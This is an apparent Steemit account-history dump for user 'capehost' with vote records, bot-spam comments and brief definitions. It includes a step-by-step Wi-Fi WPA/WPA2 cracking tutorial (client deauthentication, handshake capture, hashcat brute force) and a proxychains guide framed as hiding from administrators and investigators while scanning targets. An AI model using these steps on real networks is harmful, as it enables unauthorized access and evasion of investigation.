/mymask.hcmask</p> <p>Here, –m 2500 tell to crack WPA/WPA2<br /> -a 3 tells to use brute-force or mask based brute force (more on it later)<br /> -session=my_session tell to save the session (in case you plan to resume it later, it takes a very long time.)<br /> /for_cat.hccap is path to your captured and cleaned prepared hashcat file<br /> /mymask.hccap is path to the mask file</p> <p>Once it’s done, the saved password will be stored in a .pot file (located in /usr/share/oclhashcat/ for kali) </p> <p><strong>NOTES ON HASHCAT MASKS</strong>The mask can take following format:</p> <ul> <li>?u for upper case letters (ABC…)</li> <li>?l for lower case letters (abc…)</li> <li>?d for numbers</li> <li>?s for symbols (ASCII only I think)</li> <li>?a use all of the above characters</li> </ul> <p>Thus to create a mask type in a black file:</p> <ul> <li>?d?d?d?d?d?d?d?d for a 8 digit password</li> </ul> <p>That’s it for this tutorial. </p>
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      "body": "<p><img src=\"//i63.tinypic.com/261hs2u.jpg\" /></p>\n<p>There are many ways to crack a WPA/WPA2 password. We all know that a GPU (Graphic Processing Unit) is way faster than a CPU in terms of computation. So, we’ll use the power of GPU to speed up WPA/WPA2 cracking.The tools used will be (available for both windows and Linux.)</p>\n<ol>\n  <li><strong>Aircrack-ng</strong></li>\n  <li><strong>Oclhashcat</strong></li>\n</ol>\n<p>This guide assumes the following things:</p>\n<ul>\n  <li>wlan0                             is a WiFi interface</li>\n  <li>mon0                             is the interface in monitor mode</li>\n  <li>&lt;channel&gt;                     refers to the channel the target WI-Fi is operating on</li>\n  <li>00:2d:37:4b:e4:d5      is the MAC address of target AP (access point) (not real)</li>\n  <li>cc:cc:4e:5b:d7:3d         is MAC of client associated with the target AP (not real)</li>\n  <li># (hash symbol)           is used to mark start of a command</li>\n</ul>\n<p><strong>Steps:</strong></p>\n<p>Open up a terminal </p>\n<p>Start by putting Wi-Fi interface in monitor mode</p>\n<pre><code>#airmon-ng start wlan0</code></pre>\n<p>This puts Wi-Fi in monitor mode and creates a new interface mon0 to sniff traffic.</p>\n<p>Then, start sniffing air for all AP’s in the area.</p>\n<pre><code>#airodump-ng mon0</code></pre>\n<p>This will give you information about all AP’s in your vicinity. Select one with highest strength and focus on that one.</p>\n<p>Press Ctrl+C to stop above command and type:</p>\n<pre><code>#airodump-ng –c –bssid 00:2d:37:4b:e4:d5 –w mon0</code></pre>\n<p>This command only sniffs for one specific AP:<br />\n-c tells which channel to sniff<br />\n-bssid is the MAC of AP to target<br />\n-w tell to write a file to capture handshake (for later use in recovering password)<br />\nmon0 is the monitor interface</p>\n<p>Notice the MAC address of clients shown in the terminal; we’ll need it for the next step. </p>\n<p>Now, open a second terminal and type:</p>\n<pre><code>#aireplay-ng -0 5 –a 00:2d:37:4b:e4:d5 –c cc:cc:4e:5b:d7:3d mon0</code></pre>\n<p>This command says to de-authenticate a client from its AP<br />\n-0 tell how many time to send deauth signal (in this case 5 times)<br />\n-a tell the MAC of AP<br />\n-c tell the MAC of client connect to AP (<em>Note:</em> you can do a broadcast deauth, but it doesn’t work all the time. Target a specific client instead.)</p>\n<p>mon0 is our interface. Once you see that airodump-ng shows Handshake captured in upper-right corner, stop the process (otherwise, it keeps deauthing the clients).</p>\n<p>Once handshake file is captured and written (in format file.cap), clean the file using the following command:</p>\n<pre><code>#wpaclean clean_file.cap captured.cap</code></pre>\n<p>Here, clean_file.cap is output file. And, captured.cap is the input file (the file you captured). </p>\n<p>Now, prepare the file for hashcat by:</p>\n<pre><code>#aircrack-ng clean_file.cap -J for_cat</code></pre>\n<p>Here, clean_file.cap is from previous step. And, for_cat is for hashcat use (it will automatically add .hccap extension) </p>\n<p>Now, begin the cracking process by:</p>\n<p>#oclhashcat –m 2500 –a 3 –session=my_session /for_cat.hccap /mymask.hcmask</p>\n<p>Here, –m 2500 tell to crack WPA/WPA2<br />\n-a 3 tells to use brute-force or mask based brute force (more on it later)<br />\n-session=my_session tell to save the session (in case you plan to resume it later, it takes a very long time.)<br />\n/for_cat.hccap is path to your captured and cleaned prepared hashcat file<br />\n/mymask.hccap is path to the mask file</p>\n<p>Once it’s done, the saved password will be stored in a .pot file (located in /usr/share/oclhashcat/ for kali) </p>\n<p><strong>NOTES ON HASHCAT MASKS</strong>The mask can take following format:</p>\n<ul>\n  <li>?u for upper case letters (ABC…)</li>\n  <li>?l for lower case letters (abc…)</li>\n  <li>?d for numbers</li>\n  <li>?s for symbols (ASCII only I think)</li>\n  <li>?a use all of the above characters</li>\n</ul>\n<p>Thus to create a mask type in a black file:</p>\n<ul>\n  <li>?d?d?d?d?d?d?d?d for a 8 digit password</li>\n</ul>\n<p>That’s it for this tutorial. </p>",
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2016/08/10 07:22:00
voterrobert.stone
authorcapehost
permlinkavoid-detection-using-proxychains
weight10000 (100.00%)
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2016/08/10 06:43:27
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authorjesta
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2016/08/10 06:41:54
parent author
parent permlinkdetection
authorcapehost
permlinkavoid-detection-using-proxychains
titleAvoid Detection Using Proxychains
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2016/08/10 06:41:06
parent author
parent permlinkdetection
authorcapehost
permlinkavoid-detection-using-proxychains
titleAvoid Detection Using Proxychains
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2016/08/10 06:38:24
votercapehost
authorcapehost
permlinkavoid-detection-using-proxychains
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2016/08/10 06:38:24
parent author
parent permlinkdetection
authorcapehost
permlinkavoid-detection-using-proxychains
titleAvoid Detection Using Proxychains
body<p><img src="//i63.tinypic.com/dgphjs.jpg" /></p> <p>Hi Computer Security Enthusiasts,In this tutorial, I’m going to explain how to stay anonymous and keep your internet traffic private. Before starting, you know that every hacker needs to hide his tracks. We need to make it difficult for system administrators, investigators and others to track our moves or to spy on us. I believe we have the right to uncensored communication. </p> <p><strong>What are Proxychains?</strong><br /> A proxychain is a tool that combines many proxies to assure a higher levels of anonymity.</p> <p>If you are using Kali Linux distribution, just type <strong>locate proxychains</strong> in your terminal:</p> <p><strong>root@Ghost:~#</strong> locate proxychains<br /> /etc/proxychains.conf<br /> /root/.config/google-chrome/Default/Local Storage/http_proxychains.sourceforge.net_0.localstorage<br /> /root/.config/google-chrome/Default/Local Storage/http_proxychains.sourceforge.net_0.localstorage-journal<br /> etc…</p> <p><img src="//i68.tinypic.com/qpm4gw.png" /></p> <p>As you can see, proxychains are built in Kali linux and we can use the command from any<br /> directory (simply because it’s in the<strong> /usr/bin </strong> directory.) </p> <p>To use proxychains, for example, to anonymously scan a website, just type:<br /> root<a href="https://www.cybrary.it/members/ghost/" rel="noopener">@ghost</a>:~#<strong> proxychains nmap ­sS &lt;IP address&gt;</strong> </p> <p><img src="//i68.tinypic.com/n4yya9.png" /></p> <p><strong>Proxychains Configuration</strong></p> <p>If you want to configure your proxychains, you need to open the configuration file  <strong>/etc/proxychains.conf </strong>using a text editor like Vim or leafpad etc…</p> <p>root<a href="https://www.cybrary.it/members/ghost/" rel="noopener">@ghost</a>:~# <strong>vi /etc/proxychains.conf</strong></p> <p><img src="//i65.tinypic.com/2lntj7r.png" /></p> <p><strong> </strong>To add IP addresses for new proxies, you just need to replace “ #add proxy here… “ by your IP address list. As you can see, proxychains use the default Tor configuration <strong>127.0.0.1 on port 9050.</strong>  So, if you’re using it, leave it (else comment that line).</p>
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      "body": "<p><img src=\"//i63.tinypic.com/dgphjs.jpg\" /></p>\n<p>Hi Computer Security Enthusiasts,In this tutorial, I’m going to explain how to stay anonymous and keep your internet traffic private. Before starting, you know that every hacker needs to hide his tracks. We need to make it difficult for system administrators, investigators and others to track our moves or to spy on us. I believe we have the right to uncensored communication. </p>\n<p><strong>What are Proxychains?</strong><br />\nA proxychain is a tool that combines many proxies to assure a higher levels of anonymity.</p>\n<p>If you are using Kali Linux distribution, just type <strong>locate proxychains</strong> in your terminal:</p>\n<p><strong>root@Ghost:~#</strong> locate proxychains<br />\n/etc/proxychains.conf<br />\n/root/.config/google-chrome/Default/Local Storage/http_proxychains.sourceforge.net_0.localstorage<br />\n/root/.config/google-chrome/Default/Local Storage/http_proxychains.sourceforge.net_0.localstorage-journal<br />\netc…</p>\n<p><img src=\"//i68.tinypic.com/qpm4gw.png\" /></p>\n<p>As you can see, proxychains are built in Kali linux and we can use the command from any<br />\ndirectory (simply because it’s in the<strong> /usr/bin </strong> directory.) </p>\n<p>To use proxychains, for example, to anonymously scan a website, just type:<br />\nroot<a href=\"https://www.cybrary.it/members/ghost/\" rel=\"noopener\">@ghost</a>:~#<strong> proxychains nmap ­sS &lt;IP address&gt;</strong> </p>\n<p><img src=\"//i68.tinypic.com/n4yya9.png\" /></p>\n<p><strong>Proxychains Configuration</strong></p>\n<p>If you want to configure your proxychains, you need to open the configuration file  <strong>/etc/proxychains.conf </strong>using a text editor like Vim or leafpad etc…</p>\n<p>root<a href=\"https://www.cybrary.it/members/ghost/\" rel=\"noopener\">@ghost</a>:~# <strong>vi /etc/proxychains.conf</strong></p>\n<p><img src=\"//i65.tinypic.com/2lntj7r.png\" /></p>\n<p><strong> </strong>To add IP addresses for new proxies, you just need to replace “ #add proxy here… “ by your IP address list. As you can see, proxychains use the default Tor configuration <strong>127.0.0.1 on port 9050.</strong>  So, if you’re using it, leave it (else comment that line).</p>",
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2016/08/06 20:37:15
votercapehost
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2016/08/06 11:19:00
voterbrigichin
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2016/08/06 10:41:57
votercapehost
authorjacor
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2016/08/06 09:16:33
votercapehost
authorcapehost
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2016/08/06 09:16:33
parent author
parent permlinktechreview
authorcapehost
permlinktoday-s-question-what-s-a-proxy-server
titleToday’s Question: What’s a Proxy Server?
body<pre><code><strong>Answer:</strong> A proxy server is a server that acts as an  intermediary for requests from clients seeking resources from other  servers. A proxy server is associated with or part of a gateway server  that separates the enterprise network from the outside network and a  firewall server that protects the enterprise network from outside  intrusion. Most proxies are web proxies, facilitating access to content  on the World Wide Web and providing anonymity. </code></pre>
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2016/08/05 13:46:09
voteretccrap
authorcapehost
permlinktoday-s-question-what-are-exploit-kits
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2016/08/05 13:46:06
parent authorcapehost
parent permlinktoday-s-question-what-are-exploit-kits
authoretccrap
permlinktoday-s-question-what-are-exploit-kits
title
bodyDear User known as @capehost Steemit has a BOT problem! Your Vote Counts... Maybe https://steemit.com/steemit/@weenis/bots-steemit-s-first-community-based-decision-on-bots-your-vote-counts-to-be-or-not-to-be-details-inside
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      "body": "Dear User known as @capehost \n Steemit has a BOT problem! Your Vote Counts... Maybe \n https://steemit.com/steemit/@weenis/bots-steemit-s-first-community-based-decision-on-bots-your-vote-counts-to-be-or-not-to-be-details-inside",
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2016/08/05 13:45:27
parent author
parent permlinkexploit
authorcapehost
permlinktoday-s-question-what-are-exploit-kits
titleToday’s Question: What are Exploit Kits?
bodyAccording to Wikipedia, “an exploit kit is a software kit designed to run on web servers, with the purpose of identifying software vulnerabilities in client machines communicating with it, and discovering and exploiting vulnerabilities to upload and execute malicious code on the client. One of the earlier kits was MPack, in 2006. Exploit kits are often designed to be modular and easy to use, enabling the addition of new vulnerabilities and the removal of existing ones. Exploit kits also provide a user interface for the person who controls them, which typically includes information on success rates and other types of statistics, as well as the ability to control their settings. A typical kit is a collection of PHP scripts that target security holes in commonly used programs such as Apple Quicktime or Mozilla Firefox. Widely used software such as Oracle Java and Adobe Systems products are targeted particularly often.”
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2016/08/05 13:41:42
votergaspot
authorcapehost
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2016/08/05 13:41:39
parent authorcapehost
parent permlinktoday-s-question-what-are-exploit-kits
authorgaspot
permlinktoday-s-question-what-are-exploit-kits
title
bodyDear User known as @capehost Steemit has a BOT problem! Your Vote Counts... Maybe https://steemit.com/steemit/@weenis/bots-steemit-s-first-community-based-decision-on-bots-your-vote-counts-to-be-or-not-to-be-details-inside
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      "body": "Dear User known as @capehost \n Steemit has a BOT problem! Your Vote Counts... Maybe \n https://steemit.com/steemit/@weenis/bots-steemit-s-first-community-based-decision-on-bots-your-vote-counts-to-be-or-not-to-be-details-inside",
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2016/08/05 13:40:48
votercapehost
authorcapehost
permlinktoday-s-question-what-are-exploit-kits
weight10000 (100.00%)
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2016/08/05 13:40:48
parent author
parent permlinkexploit
authorcapehost
permlinktoday-s-question-what-are-exploit-kits
titleToday’s Question: What are Exploit Kits?
bodyAccording to Wikipedia, “an exploit kit is a software kit designed to run on web servers, with the purpose of identifying software vulnerabilities in client machines communicating with it, and discovering and exploiting vulnerabilities to upload and execute malicious code on the client. One of the earlier kits was MPack, in 2006. Exploit kits are often designed to be modular and easy to use, enabling the addition of new vulnerabilities and the removal of existing ones. Exploit kits also provide a user interface for the person who controls them, which typically includes information on success rates and other types of statistics, as well as the ability to control their settings. A typical kit is a collection of PHP scripts that target security holes in commonly used programs such as Apple Quicktime or Mozilla Firefox. Widely used software such as Oracle Java and Adobe Systems products are targeted particularly often.”
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steemcreated a new account: @capehost
2016/08/05 10:38:03
fee3.000 STEEM
creatorsteem
new account namecapehost
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Account Metadata

POSTING JSON METADATA
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JSON METADATA
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Auth Keys

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Single Signature
Public Keys
STM7y3vaKVzR3uQTmLq44j95e3fM6ccdgHrC3npbYK1PmREjQfXtE1/1
Active
Single Signature
Public Keys
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Memo
STM8E2ehRvH91eksSPiAKWzaQdvfJ7R3YZQo5L34STjRSvXYGTgfK
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Witness Votes

0 / 30
No active witness votes.
[]